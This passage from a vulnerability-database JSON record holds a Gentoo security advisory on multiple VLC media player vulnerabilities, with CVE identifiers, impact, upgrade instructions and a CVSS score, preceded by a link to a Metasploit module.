"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/vlc_webm.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1684", "CVE-2011-0522", "CVE-2012-3377", "CVE-2011-2194", "CVE-2013-1954", "CVE-2010-3124", "CVE-2011-0531", "CVE-2010-1441", "CVE-2012-1775", "CVE-2011-2588", "CVE-2013-1868", "CVE-2010-3275", "CVE-2010-1442", "CVE-2013-6283", "CVE-2011-3623", "CVE-2010-3907", "CVE-2010-2937", "CVE-2011-0021", "CVE-2012-2396", "CVE-2011-1087", "CVE-2013-6934", "CVE-2012-0023", "CVE-2012-5855", "CVE-2012-5470", "CVE-2010-1443", "CVE-2013-4388", "CVE-2012-1776", "CVE-2010-3276", "CVE-2010-1445", "CVE-2013-3245", "CVE-2011-2587", "CVE-2010-1444", "CVE-2010-2062"], "description": "### Background\n\nVLC is a cross-platform media player and streaming server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in VLC. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file using VLC, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll VLC users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/vlc-2.1.2\"", "edition": 1, "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "GLSA-201411-01", "href": "https://security.gentoo.org/glsa/201411-01", "type": "gentoo", "title": "VLC: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}